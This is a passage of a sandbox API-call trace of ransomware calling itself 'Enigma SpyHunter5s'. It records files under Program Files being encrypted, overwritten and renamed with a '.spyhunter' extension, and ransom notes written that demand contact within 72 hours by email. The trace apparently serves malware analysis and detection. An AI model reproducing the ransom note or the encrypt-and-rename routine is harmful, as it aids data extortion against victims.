hTemplateFile=0x0) returned 0x178 [0178.254] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 79 [0178.254] StrStrW (lpFirst="Desktop.ini", lpSrch=".txt") returned 0x0 [0178.254] GetProcessHeap () returned 0x2c0000 [0178.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0178.255] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e3bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e3bc*=0x285, lpOverlapped=0x0) returned 1 [0178.255] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffd7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.255] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x57e3bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e3bc*=0x285, lpOverlapped=0x0) returned 1 [0178.255] GetProcessHeap () returned 0x2c0000 [0178.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0178.256] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.256] WriteFile (in: hFile=0x178, lpBuffer=0x57e3fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e3bc, lpOverlapped=0x0 | out: lpBuffer=0x57e3fc*, lpNumberOfBytesWritten=0x57e3bc*=0x4, lpOverlapped=0x0) returned 1 [0178.256] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e3bc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e3bc*=0x30, lpOverlapped=0x0) returned 1 [0178.256] CloseHandle (hObject=0x178) returned 1 [0178.256] GetProcessHeap () returned 0x2c0000 [0178.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.256] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.spyhunter") returned 89 [0178.256] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\desktop.ini.spyhunter")) returned 1 [0178.260] GetProcessHeap () returned 0x2c0000 [0178.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.260] GetProcessHeap () returned 0x2c0000 [0178.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.260] GetProcessHeap () returned 0x2c0000 [0178.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee9338 | out: hHeap=0x2c0000) returned 1 [0178.260] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e400 | out: pbBuffer=0x57e400) returned 1 [0178.260] GetProcessHeap () returned 0x2c0000 [0178.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.260] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3f8*=0x30) returned 1 [0178.260] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.260] GetProcessHeap () returned 0x2c0000 [0178.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.260] GetProcessHeap () returned 0x2c0000 [0178.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee9250 | out: hHeap=0x2c0000) returned 1 [0178.260] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3f8 | out: pbBuffer=0x57e3f8) returned 1 [0178.260] GetProcessHeap () returned 0x2c0000 [0178.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.261] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3f0*=0x30) returned 1 [0178.261] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.261] GetProcessHeap () returned 0x2c0000 [0178.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.261] GetProcessHeap () returned 0x2c0000 [0178.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee9168 | out: hHeap=0x2c0000) returned 1 [0178.261] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0178.262] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.262] WriteFile (in: hFile=0x178, lpBuffer=0x57e32b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e454, lpOverlapped=0x0 | out: lpBuffer=0x57e32b*, lpNumberOfBytesWritten=0x57e454*=0x127, lpOverlapped=0x0) returned 1 [0178.263] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.263] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e454, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e454*=0x2ac, lpOverlapped=0x0) returned 1 [0178.263] CloseHandle (hObject=0x178) returned 1 [0178.263] GetProcessHeap () returned 0x2c0000 [0178.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e80c60 | out: hHeap=0x2c0000) returned 1 [0178.263] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3f0 | out: pbBuffer=0x57e3f0) returned 1 [0178.263] GetProcessHeap () returned 0x2c0000 [0178.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.263] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3e8*=0x30) returned 1 [0178.263] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\portalconnectcore.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0178.264] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll") returned 85 [0178.264] StrStrW (lpFirst="PortalConnectCore.dll", lpSrch=".txt") returned 0x0 [0178.264] GetProcessHeap () returned 0x2c0000 [0178.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0178.264] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e3ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e3ac*=0x2800, lpOverlapped=0x0) returned 1 [0178.371] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.371] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e3ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e3ac*=0x2800, lpOverlapped=0x0) returned 1 [0178.371] GetProcessHeap () returned 0x2c0000 [0178.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0178.371] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.371] WriteFile (in: hFile=0x178, lpBuffer=0x57e3ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e3ac, lpOverlapped=0x0 | out: lpBuffer=0x57e3ec*, lpNumberOfBytesWritten=0x57e3ac*=0x4, lpOverlapped=0x0) returned 1 [0178.373] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e3ac, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e3ac*=0x30, lpOverlapped=0x0) returned 1 [0178.373] CloseHandle (hObject=0x178) returned 1 [0178.373] GetProcessHeap () returned 0x2c0000 [0178.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.373] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll.spyhunter") returned 95 [0178.373] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\portalconnectcore.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\portalconnectcore.dll.spyhunter")) returned 1 [0178.375] GetProcessHeap () returned 0x2c0000 [0178.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.375] GetProcessHeap () returned 0x2c0000 [0178.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.375] GetProcessHeap () returned 0x2c0000 [0178.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4bb90 | out: hHeap=0x2c0000) returned 1 [0178.375] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Office Setup Controller\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\office setup controller\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0178.376] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.376] WriteFile (in: hFile=0x178, lpBuffer=0x57e323*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e44c, lpOverlapped=0x0 | out: lpBuffer=0x57e323*, lpNumberOfBytesWritten=0x57e44c*=0x127, lpOverlapped=0x0) returned 1 [0178.377] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.377] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e44c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e44c*=0x2ac, lpOverlapped=0x0) returned 1 [0178.378] CloseHandle (hObject=0x178) returned 1 [0178.378] GetProcessHeap () returned 0x2c0000 [0178.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee6de8 | out: hHeap=0x2c0000) returned 1 [0178.378] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3e8 | out: pbBuffer=0x57e3e8) returned 1 [0178.378] GetProcessHeap () returned 0x2c0000 [0178.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.378] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3e0*=0x30) returned 1 [0178.378] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSOXMLMF.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\msoxmlmf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0178.379] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSOXMLMF.DLL") returned 78 [0178.379] StrStrW (lpFirst="MSOXMLMF.DLL", lpSrch=".txt") returned 0x0 [0178.379] GetProcessHeap () returned 0x2c0000 [0178.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0178.379] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e3a4*=0x2800, lpOverlapped=0x0) returned 1 [0178.432] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.432] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e3a4*=0x2800, lpOverlapped=0x0) returned 1 [0178.433] GetProcessHeap () returned 0x2c0000 [0178.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0178.433] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.433] WriteFile (in: hFile=0x178, lpBuffer=0x57e3e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e3a4, lpOverlapped=0x0 | out: lpBuffer=0x57e3e4*, lpNumberOfBytesWritten=0x57e3a4*=0x4, lpOverlapped=0x0) returned 1 [0178.434] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e3a4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e3a4*=0x30, lpOverlapped=0x0) returned 1 [0178.434] CloseHandle (hObject=0x178) returned 1 [0178.434] GetProcessHeap () returned 0x2c0000 [0178.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.434] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSOXMLMF.DLL.spyhunter") returned 88 [0178.434] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSOXMLMF.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\msoxmlmf.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSOXMLMF.DLL.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\msoxmlmf.dll.spyhunter")) returned 1 [0178.435] GetProcessHeap () returned 0x2c0000 [0178.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.436] GetProcessHeap () returned 0x2c0000 [0178.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.436] GetProcessHeap () returned 0x2c0000 [0178.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee8eb0 | out: hHeap=0x2c0000) returned 1 [0178.441] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3e8 | out: pbBuffer=0x57e3e8) returned 1 [0178.441] GetProcessHeap () returned 0x2c0000 [0178.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.441] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3e0*=0x30) returned 1 [0178.441] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\msoshext.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\msoshext.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0178.442] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\msoshext.dll") returned 78 [0178.442] StrStrW (lpFirst="msoshext.dll", lpSrch=".txt") returned 0x0 [0178.443] GetProcessHeap () returned 0x2c0000 [0178.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0178.443] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e3a4*=0x2800, lpOverlapped=0x0) returned 1 [0178.551] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.551] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e3a4*=0x2800, lpOverlapped=0x0) returned 1 [0178.551] GetProcessHeap () returned 0x2c0000 [0178.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0178.551] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.551] WriteFile (in: hFile=0x178, lpBuffer=0x57e3e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e3a4, lpOverlapped=0x0 | out: lpBuffer=0x57e3e4*, lpNumberOfBytesWritten=0x57e3a4*=0x4, lpOverlapped=0x0) returned 1 [0178.649] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e3a4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e3a4*=0x30, lpOverlapped=0x0) returned 1 [0178.650] CloseHandle (hObject=0x178) returned 1 [0178.680] GetProcessHeap () returned 0x2c0000 [0178.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.680] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\msoshext.dll.spyhunter") returned 88 [0178.680] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\msoshext.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\msoshext.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\msoshext.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\msoshext.dll.spyhunter")) returned 1 [0178.683] GetProcessHeap () returned 0x2c0000 [0178.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.683] GetProcessHeap () returned 0x2c0000 [0178.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.683] GetProcessHeap () returned 0x2c0000 [0178.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee8dc8 | out: hHeap=0x2c0000) returned 1 [0178.684] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3e0 | out: pbBuffer=0x57e3e0) returned 1 [0178.684] GetProcessHeap () returned 0x2c0000 [0178.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.684] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3d8*=0x30) returned 1 [0178.684] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Csi.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\csi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0178.685] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Csi.dll") returned 73 [0178.685] StrStrW (lpFirst="Csi.dll", lpSrch=".txt") returned 0x0 [0178.685] GetProcessHeap () returned 0x2c0000 [0178.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0178.685] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e39c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e39c*=0x2800, lpOverlapped=0x0) returned 1 [0178.767] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.767] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e39c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e39c*=0x2800, lpOverlapped=0x0) returned 1 [0178.768] GetProcessHeap () returned 0x2c0000 [0178.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0178.769] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.769] WriteFile (in: hFile=0x9c, lpBuffer=0x57e3dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e39c, lpOverlapped=0x0 | out: lpBuffer=0x57e3dc*, lpNumberOfBytesWritten=0x57e39c*=0x4, lpOverlapped=0x0) returned 1 [0178.909] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e39c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e39c*=0x30, lpOverlapped=0x0) returned 1 [0178.909] CloseHandle (hObject=0x9c) returned 1 [0178.909] GetProcessHeap () returned 0x2c0000 [0178.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.909] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft 